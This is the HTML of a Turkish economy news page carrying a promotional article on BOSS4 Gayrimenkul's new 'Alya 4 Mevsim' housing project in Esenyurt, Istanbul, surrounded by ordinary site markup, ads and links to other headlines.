		<div class="f-baslik">Flaş Haber</div>
		<div class="f-haber">
			<a href="http://www.gazeteekonomi.com/otomotiv/sifir-aracta-indirim-yuzde-16-olacak-ikinci-elde-dusus-az-sonra-h584195.html" title="Sıfır araçta indirim yüzde 16 olacak ikinci elde düşüş az sonra" target="_blank">Sıfır araçta indirim yüzde 16 olacak ikinci elde düşüş az sonra</a>
		</div>
		<span class="glyphicons remove_2 f_kapat"></span>
	</div>
</div>
    </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="http://www.gazeteekonomi.com/banner.php?id=25" target="_blank" rel="nofollow"><img src="http://www.gazeteekonomi.com/thumb.php?src=http://www.gazeteekonomi.com/images/banner/biotrend-989-90.png&w=980&h=90&q=80" width="980" height="90" style="width:980px;height: 90px;border:0" alt="banner25" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="http://www.gazeteekonomi.com/ekonomi-finans/oyun-basliyor-h584247.html" title="Oyun başlıyor" >
      <img src="http://www.gazeteekonomi.com/images/haberler/ustmanset/2021/08/gamescom.jpg" alt="Oyun başlıyor" />
      <div class="caption">Oyun başlıyor</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.gazeteekonomi.com/ekonomi-finans/sile-ye-hucum-h584243.html" title="Şile&#039;ye hücum" >
      <img src="http://www.gazeteekonomi.com/images/haberler/ustmanset/2021/08/Sile-Galeri.jpg" alt="Şile&#039;ye hücum" />
      <div class="caption">Şile otellerine hücum</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.gazeteekonomi.com/ekonomi-finans/sutun-efesini-uretiyor-h584233.html" title="Sütün efesini üretiyor" >
      <img src="http://www.gazeteekonomi.com/images/haberler/ustmanset/2021/08/efelerciftligi_6.jpg" alt="Sütün efesini üretiyor" />
      <div class="caption">Sütün efesini üretiyor</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.gazeteekonomi.com/ekonomi-finans/dunyaya-aciliyor-h584222.html" title="Dünyaya açılıyor" >
      <img src="http://www.gazeteekonomi.com/images/haberler/ustmanset/2021/08/Kelebek_Mobilya1.jpg" alt="Dünyaya açılıyor" />
      <div class="caption">Dünyaya açılıyor</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.gazeteekonomi.com/ekonomi-finans/hiper-araciyla-kazanacak-h584228.html" title="Hiper aracıyla kazanacak" >
      <img src="http://www.gazeteekonomi.com/images/haberler/ustmanset/2021/08/HYBRID-3.jpg" alt="Hiper aracıyla kazanacak" />
      <div class="caption">Hiper aracıyla kazanacak</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->



      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Ara vermeden ev yapmaya devam ediyor</h1>
                <h2 class="lead" itemprop="description"><strong>BOSS4 Gayrimenkul Yönetim Kurulu Başkanı Abdülkadir Akkuş, inşaat çalışmalarına ara vermeden devam ettiklerini, yeni projeleriyle Esenyurt bölgesine de adım atmış olduklarını kaydetti. Akkuş “Bugüne kadar genelde Beylikdüzü ve çevresinde yatırımlar yaptık. Şimdi farklı alanlara da açılıyoruz. Levent’te devam eden ‘Alya Teras’ın dışında, Esenyurt’ta da ‘Alya 4 Mevsim’i hayata geçiriyoruz&quot; dedi.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-08-26 09:28:33" content="2021-08-26T09:28:33+02:00">26 Ağustos 2021 Perşembe 09:28</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/ara_vermeden_ev_yapmaya_devam_ediyor_h584250_13612.jpg" alt="Ara vermeden ev yapmaya devam ediyor" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-584250"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
    <div class="reklam reklam132 haber"><a href="http://www.gazeteekonomi.com/banner.php?id=17" target="_blank" rel="nofollow"><img src="http://www.gazeteekonomi.com/thumb.php?src=http://www.gazeteekonomi.com/images/banner/biotrend-300-250.png&w=300&h=250&q=80" width="300" height="250" style="width:300px;height: 250px;border:0" alt="banner17" class="img-responsive"/></a></div>                    <div itemprop="articleBody" id="newsbody"><p>Modern şehircilik çizgisinde, güvenilir ve örnek alınan şirket vizyonuyla çalışmalarını yürüten <strong class="klink">BOSS4</strong> Gayrimenkul’ün yeni projesi <strong class="klink">‘Alya 4 Mevsim’de</strong> ön talep toplama süreci başladı. Eylül ayında lansmana hazırlanan ‘Alya 4 Mevsim’, şirketin <strong class="klink">Esenyurt</strong>’ta hayata geçirdiği ilk proje olma özelliği taşıyor.</p><div class="p_ad"></div>

<p>Gayrimenkul ve inşaat sektörünün yenilikçi markalarından Akkuş Gayrimenkul’ün Lübnanlı ortağıyla kurduğu BOSS4 Gayrimenkul İnşaat’ın hayata geçirmeye hazırlandığı ‘Alya 4 Mevsim’de talep toplama süreci başladı. Şirketin yılın son projesi olan ve lansmanının eylül ayında yapılması planlanan ‘Alya 4 Mevsim’, 11 katlı dört blokta toplam 217 daire ve 6 dükkandan oluşuyor. Projedeki daire tipleri ise; 1+1, 2+1 ve 3 +1 olarak planlandı.</p>

<p>‘Alya 4 Mevsim’ ile ilgili bilgi veren BOSS4 Gayrimenkul Yönetim Kurulu Başkanı Abdülkadir Akkuş, inşaat çalışmalarına ara vermeden devam ettiklerini, yeni projeleriyle Esenyurt bölgesine de adım atmış olduklarını kaydetti. Akkuş “Bugüne kadar genelde Beylikdüzü ve çevresinde yatırımlar yaptık. Şimdi farklı alanlara da açılıyoruz. Levent’te devam eden ‘Alya Teras’ın dışında, Esenyurt’ta da ‘Alya 4 Mevsim’i hayata geçiriyoruz. Ön talep sürecini başlattığımız projenin lansmanını eylül ayı sonunda yapmayı hedefliyoruz. Lansmana kadar satış ofisimizi ve örnek dairemizi de tamamlamış olmayı planlıyoruz. ‘Alya 4 Mevsim’ kaliteli ve elit bir yaşam sunan bir proje, diğer projelerden ayrılan özelliklerini ise tasarım, malzeme kalitesi, konsepti, dış cephe şeklinde sıralamak mümkün. ‘Alya Dört Mevsim’ Esenyurt için iddialı bir proje olacak” dedi.</p>

<p></p>

<p>Geniş peyzajıyla doğayla içi içe bir yaşam sunuyor</p>

<p>BOSS Gayrimenkul’ün Esenyurt’ta hayata geçirdiği ilk projesi olma özelliği taşıyan ‘Alya 4 Mevsim’, yüksek kalite ve lüks dairelerden oluşacak. Sosyal alanda; lobi, kapalı havuz, spor salonu, etkinlik-toplantı salonu, Türk hamamı, bay-bayan soyunma kabinleri, sauna ve buhar odası mevcut. Projede ayrıca 157 araçlık kapalı otopark alanı da yer alıyor.</p>

<p>‘Alya 4 Mevsim’, Esenyurt’un merkezinde yer alan konumu, konsepti ve geniş peyzajıyla bölgeye yeni bir yaşam anlayışı kazandırmaya hazırlanıyor. Şehrin kalabalığından uzak, ferah bir yaşam alanı yaratan proje, merkezi konumunun verdiği avantajının yanı sıra sosyal donatı alanlarıyla doğanın içinde, tam anlamıyla bir sosyalleşme ortamı yaratıyor.</p></p></div>
        <div class="reklam reklam136 text-center"><a href="http://www.gazeteekonomi.com/banner.php?id=18" target="_blank" rel="nofollow"><img src="http://www.gazeteekonomi.com/thumb.php?src=http://www.gazeteekonomi.com/images/banner/biotrend-620-90_1.png&w=620&h=90&q=80" width="620" height="90" style="width:620px;height: 90px;border:0" alt="banner18" class="img-responsive"/></a></div>            
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators fifteen carousel-hover">

        <li class="hs-bgca active" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/mermer-fuarina-damgasini-vurdu-h584249.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/yenilenebilir-enerji-dediler-avrupa-dan-yatirimi-aldilar-h584248.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/kripto-para-yorumu-yapacak-h584246.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/model-fabrikalar-verimliligi-artiriyor-h584245.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/teknoloji/e-donusum-cozumleri-icin-uyumsoft-u-secti-h584241.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/yangin-sonrasi-arilar-aclik-tehlikesi-ile-karsi-karsiya-100-milyon-dolarlik-ihracat-kaybi-var-h584230.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/egitim/universite-adaylarina-tercihte-son-dakika-uyarisi-yapti-h584227.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/yilin-ilk-yarisinda-satisiyuzde-110-artirdi-h584225.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/ekonomi-basininin-duayeni-deniz-topraki-yazdi-h584221.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/enerjiyi-surdurulebilirlikten-aliyor-kazanci-paylasiyor-h584219.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/turizm/birbiri-ardina-acilis-yapiyor-otel-sayisini-57-ye-cikardi-h584218.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/gencler-masrafsiz-bankacilik-ile-tanisacak-h584217.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/avrupa-serbest-bolgesi-ne-asya-dan-ziyaretci-geldi-h584216.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/ekonomi/ali-candir-dan-cok-carpici-mesajlar-h584214.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='http://www.gazeteekonomi.com/sektor/kazanin-efendisi-ihracatta-ilk-5-e-girdi-h584212.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
    
    <li class="tumu" onclick="window.location='http://www.gazeteekonomi.com/tum-mansetler.html'; return false;" >TÜMÜ</li>  </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="http://www.gazeteekonomi.com/ekonomi/mermer-fuarina-damgasini-vurdu-h584249.html" title="Mermer fuarına damgasını vurdu">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/mermer_fuarina_damgasini_vurdu_h584249_5c4b5.jpg" alt="Mermer fuarına damgasını vurdu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Mermer fuarına damgasını vurdu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/yenilenebilir-enerji-dediler-avrupa-dan-yatirimi-aldilar-h584248.html" title="Yenilenebilir enerji dediler Avrupa&#039;dan yatırımı aldılar">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/yenilenebilir_enerji_dediler_avrupa_dan_yatirimi_aldilar_h584248_852b5.jpeg" alt="Yenilenebilir enerji dediler Avrupa&#039;dan yatırımı aldılar" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Yenilenebilir enerji dediler Avrupa&#039;dan yatırımı aldılar</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/kripto-para-yorumu-yapacak-h584246.html" title="Kripto para yorumu yapacak">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/kripto_para_yorumu_yapacak_h584246_ac3b0.jpeg" alt="Kripto para yorumu yapacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kripto para yorumu yapacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/model-fabrikalar-verimliligi-artiriyor-h584245.html" title="Model fabrikalar verimliliği artırıyor">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/model_fabrikalar_verimliligi_artiriyor_h584245_fb093.jpg" alt="Model fabrikalar verimliliği artırıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Model fabrikalar verimliliği artırıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/teknoloji/e-donusum-cozumleri-icin-uyumsoft-u-secti-h584241.html" title="e-Dönüşüm çözümleri için Uyumsoft&#039;u seçti">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/e_donusum_cozumleri_icin_uyumsoft_u_secti_h584241_f78f9.jpeg" alt="e-Dönüşüm çözümleri için Uyumsoft&#039;u seçti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">e-Dönüşüm çözümleri için Uyumsoft&#039;u seçti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/yangin-sonrasi-arilar-aclik-tehlikesi-ile-karsi-karsiya-100-milyon-dolarlik-ihracat-kaybi-var-h584230.html" title="Yangın sonrası arılar açlık tehlikesi ile karşı karşıya! 100 milyon dolarlık ihracat kaybı var">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/yangin-sonrasi-arilar-aclik-tehlikesi-ile-karsi-karsiya-100-milyon-dolarlik-maddi-kayip-var_f7e55.jpg" alt="Yangın sonrası arılar açlık tehlikesi ile karşı karşıya! 100 milyon dolarlık ihracat kaybı var" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Yangın sonrası arılar açlık tehlikesi ile karşı karşıya! 100 milyon dolarlık ihracat kaybı var</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/egitim/universite-adaylarina-tercihte-son-dakika-uyarisi-yapti-h584227.html" title="Üniversite adaylarına tercihte son dakika uyarısı yaptı">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/universite_adaylarina_tercihte_son_dakika_uyarisi_yapti_h584227_c1ff2.jpg" alt="Üniversite adaylarına tercihte son dakika uyarısı yaptı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Üniversite adaylarına tercihte son dakika uyarısı yaptı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/yilin-ilk-yarisinda-satisiyuzde-110-artirdi-h584225.html" title="Yılın ilk yarısında satışı yüzde 110 artırdı">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/yilin_ilk_yarisinda_satisiyuzde_110_artirdi_h584225_60901.jpg" alt="Yılın ilk yarısında satışı yüzde 110 artırdı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Yılın ilk yarısında satışı yüzde 110 artırdı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/ekonomi-basininin-duayeni-deniz-topraki-yazdi-h584221.html" title="Ekonomi basınının duayeni Deniz Toprak’ı yazdı">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/ekonomi_basininin_duayeni_deniz_topraki_yazdi_h584221_bfd74.jpg" alt="Ekonomi basınının duayeni Deniz Toprak’ı yazdı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ekonomi basınının duayeni Deniz Toprak’ı yazdı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/enerjiyi-surdurulebilirlikten-aliyor-kazanci-paylasiyor-h584219.html" title="Enerjiyi sürdürülebilirlikten alıyor KAZANCI paylaşıyor">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/enerjiyi_surdurulebilirlikten_aliyor_kazanci_paylasiyor_h584219_a732b.jpg" alt="Enerjiyi sürdürülebilirlikten alıyor KAZANCI paylaşıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Enerjiyi sürdürülebilirlikten alıyor KAZANCI paylaşıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/turizm/birbiri-ardina-acilis-yapiyor-otel-sayisini-57-ye-cikardi-h584218.html" title="Birbiri ardına açılış yapıyor otel sayısını 57&#039;ye çıkardı">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/birbiri_ardina_acilis_yapiyor_otel_sayisini_57_ye_cikardi_h584218_0c493.jfif" alt="Birbiri ardına açılış yapıyor otel sayısını 57&#039;ye çıkardı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Birbiri ardına açılış yapıyor otel sayısını 57&#039;ye çıkardı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/gencler-masrafsiz-bankacilik-ile-tanisacak-h584217.html" title="Gençler masrafsız bankacılık ile tanışacak">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/gencler_masrafsiz_bankacilik_ile_tanisacak_h584217_28ab6.jpg" alt="Gençler masrafsız bankacılık ile tanışacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Gençler masrafsız bankacılık ile tanışacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/avrupa-serbest-bolgesi-ne-asya-dan-ziyaretci-geldi-h584216.html" title="Avrupa Serbest Bölgesi&#039;ne Asya&#039;dan ziyaretçi geldi">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/avrupa_serbest_bolgesi_ne_asya_dan_ziyaretci_geldi_h584216_74aff.jpg" alt="Avrupa Serbest Bölgesi&#039;ne Asya&#039;dan ziyaretçi geldi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Avrupa Serbest Bölgesi&#039;ne Asya&#039;dan ziyaretçi geldi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/ekonomi/ali-candir-dan-cok-carpici-mesajlar-h584214.html" title="Ali Çandır&#039;dan çok çarpıcı mesajlar">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/ali_candir_dan_cok_carpici_mesajlar_h584214_1a52d.jpg" alt="Ali Çandır&#039;dan çok çarpıcı mesajlar" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ali Çandır&#039;dan çok çarpıcı mesajlar</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.gazeteekonomi.com/sektor/kazanin-efendisi-ihracatta-ilk-5-e-girdi-h584212.html" title="Kazanın efendisi ihracatta ilk 5&#039;e girdi">

        
        <img src="http://www.gazeteekonomi.com/images/haberler/2021/08/kazanin_efendisi_ihracatta_ilk_5_e_girdi_h584212_62141.JPG" alt="Kazanın efendisi ihracatta ilk 5&#039;e girdi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kazanın efendisi ihracatta ilk 5&#039;e girdi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="http://www.gazeteekonomi.com/guvenilir-urun-platformu-etkinlikleri-resimleri,242.html" title="Güvenilir Ürün Platformu etkinlikleri">
          <img src="http://www.gazeteekonomi.com/images/album/thumbs/cnr_food_celal.jpg" alt="Güvenilir Ürün Platformu etkinlikleri" />
          <b>Güvenilir Ürün Platformu etkinlikleri</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.gazeteekonomi.com/22-dunya-petrol-kongresi-resimleri,197.html" title="22. Dünya Petrol Kongresi">
          <img src="http://www.gazeteekonomi.com/images/album/thumbs/kapak.png" alt="22. Dünya Petrol Kongresi" />
          <b>22. Dünya Petrol Kongresi</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.gazeteekonomi.com/kuresel-isinma-kurultayi-resimleri,119.html" title="Küresel Isınma Kurultayı">
          <img src="http://www.gazeteekonomi.com/images/album/thumbs/2_95.jpg" alt="Küresel Isınma Kurultayı" />
          <b>Küresel Isınma Kurultayı</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.gazeteekonomi.com/yasama-cikarilan-cagri-resimleri,70.html" title="Yaşama Çıkarılan Çağrı">
          <img src="http://www.gazeteekonomi.com/images/album/thumbs/08bacde3-8b34-4606-a60d-e55add5ecf20_1.jpg" alt="Yaşama Çıkarılan Çağrı" />
          <b>Yaşama Çıkarılan Çağrı</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.gazeteekonomi.com/haberleri/Boss4" title="Boss4 haberleri">Boss4</a><a href="http://www.gazeteekonomi.com/haberleri/Esenyurt%E2%80%99ta+hayata+ge%C3%A7iyor" title="Esenyurt’ta Hayata Geçiyor haberleri">Esenyurt’ta Hayata Geçiyor</a><a href="http://www.gazeteekonomi.com/haberleri/Esenyurt" title="Esenyurt haberleri">Esenyurt</a><a href="http://www.gazeteekonomi.com/haberleri/%E2%80%98Alya+4+Mevsim%E2%80%99de" title="‘Alya 4 Mevsim’de haberleri">‘Alya 4 Mevsim’de</a></div>
      <section>
              <div id="yorumlar">
            <ul class="nav nav-tabs" id="ytab">
              <li class="active"><a href="#yorumpanel" data-toggle="tab">Yorum Gönder <span class="label label-important">0</span></a></li>
               <li><a href="#facebookpanel" class="fbyorum hs-sdch" data-toggle="tab">Facebook Yorumları <span class="label label-inverse"><fb:comments-count href="http://www.gazeteekonomi.com/emlak/ara-vermeden-ev-yapmaya-devam-ediyor-h584250.html">0</fb:comments-count></span></a></li>            </ul>

            <div class="tab-content">
                              <div class="tab-pane active" id="yorumpanel">
                                    <div class="yorumlar panel">
                    <div id="yorumpaneli" class="row-fluid">
                    <form  name="comment" class="comment_form" id="addcomment">
                        <div class="span1">
                                                        <img src="http://www.gazeteekonomi.com/_themes/hs-rush-php/images/no_author.jpg" alt="Avatar" class="img-rounded"/>                        </div>
                        <div class="span11">
                            <div class="row-fluid">
                                <div class="input-prepend span6">
                                    <span class="add-on">Adınız</span>
                                    <input name="isim"  class="span10 adsoyad" type="text"  id="adsoyad" size="30" maxlength="50"  title="Ad soyad gerekli!" />
                                </div>
                            </div>
                            <textarea name="yorum" maxlength="1000" class="span12" id="comment_field" onkeyup="textKey(this.form)" placeholder="Yorum yazmak için bu alanı kullanabilirsiniz. Yorum yazarken lütfen aşağıda yazılan uyarıları göz önünde bulundurunuz!"></textarea>
                            <div class="span12" style="margin:0;">
                            <div class="answer span5" style="display:none;">Yanıt: <b>@name</b> <a href="javascript:void(0)" class="kaldir">x</a></div>
                            <a href="javascript:void(0)" onclick="javascript:comment_send(584250);return false;" class="btn hs-sdch btn-warning pull-right">Yorum Gönder</a>
                            <div class="karakter span4 pull-right">Kalan Karakter: <input name="character" id="character" disabled size="3" value="1000"></div></div>
                        </div>
                        <input type="hidden" name="hid" value="584250" />
                        <input type="hidden" name="uid" value="0" />
                        <input type="hidden" name="tip" value="haber" />
                        <input type="hidden" name="cevap" value="" class="answer" />
                        <input type="hidden" name="cevap_id" value="0" class="cevap_id" />
                        <input type="hidden" name="token" value="bd7a26efbf266c5516c6113179cd18895b666548" />

                    </form>
                    </div>
                    <div class="alert">Yorumunuz onaylanmak üzere yöneticiye iletilmiştir.<a class="close" data-dismiss="alert" href="#">&times;</a></div>
                </div>
                <div class="alert alert-block alert-error fade in" style="display:block;margin-top:15px;">
                    <button type="button" class="close" data-dismiss="alert">×</button>
                    <strong>Dikkat!</strong> Suç teşkil edecek, yasadışı, tehditkar, rahatsız edici, hakaret ve küfür içeren, aşağılayıcı, küçük düşürücü, kaba, müstehcen, ahlaka aykırı, kişilik haklarına zarar verici ya da benzeri niteliklerde içeriklerden doğan her türlü mali, hukuki, cezai, idari sorumluluk içeriği gönderen Üye/Üyeler’e aittir.                </div>
            

            
            
            </div> <!-- .tab-pane -->

                          <div class="tab-pane yorumlar fbpanel" id="facebookpanel">
                <div class="row-fluid">
                  <div id="fb-root"></div>
                  <script>(function(d, s, id) {
                    var js, fjs = d.getElementsByTagName(s)[0];
                    if (d.getElementById(id)) return;
                    js = d.createElement(s); js.id = id;
                    js.src = "//connect.facebook.net/tr_TR/all.js#xfbml=1";
                    fjs.parentNode.insertBefore(js, fjs);
                  }(document, 'script', 'facebook-jssdk'));</script>
                  <div class="fb-comments" data-href="http://www.gazeteekonomi.com/emlak/ara-vermeden-ev-yapmaya-devam-ediyor-h584250.html" data-width="603" data-colorscheme="light" data-numposts="10"></div>
                </div> <!-- #facebookpanel -->
              </div>
            
          </div> <!-- .tab-content -->

        </div> <!-- #yorumlar -->
    </section>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="http://www.gazeteekonomi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/kuraklik-makale,195760.html" title="Kuraklık!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/kazim-ciloglu.jpg" alt="Kazım Çiloğlu">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/50/kazim-ciloglu" title="Kazım Çiloğlu">Kazım Çiloğlu</a></h4>
              <a href="http://www.gazeteekonomi.com/kuraklik-makale,195760.html" title="Kuraklık!" >Kuraklık!</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/yeni-bir-hafta-yeni-bir-ay-basliyor-makale,195729.html" title="Yeni bir hafta, yeni bir ay başlıyor…" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/NALAN_METIYN.jpg" alt="Nalan Mettin Kızılkaya - Sağlıklı Beslenme Koçu">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/139/nalan-mettin-kizilkaya-saglikli-beslenme-kocu" title="Nalan Mettin Kızılkaya - Sağlıklı Beslenme Koçu">Nalan Mettin Kızılkaya - Sağlıklı Beslenme Koçu</a></h4>
              <a href="http://www.gazeteekonomi.com/yeni-bir-hafta-yeni-bir-ay-basliyor-makale,195729.html" title="Yeni bir hafta, yeni bir ay başlıyor…" >Yeni bir hafta, yeni bir ay başlıyor…</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/burcu-kosem-kimdir-makale,195720.html" title="Burcu Kösem kimdir?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/Marka_Stratejisti_Bahar_Aray.jpg" alt="Bahar Aray / Marka Stratejisti">
            </div>
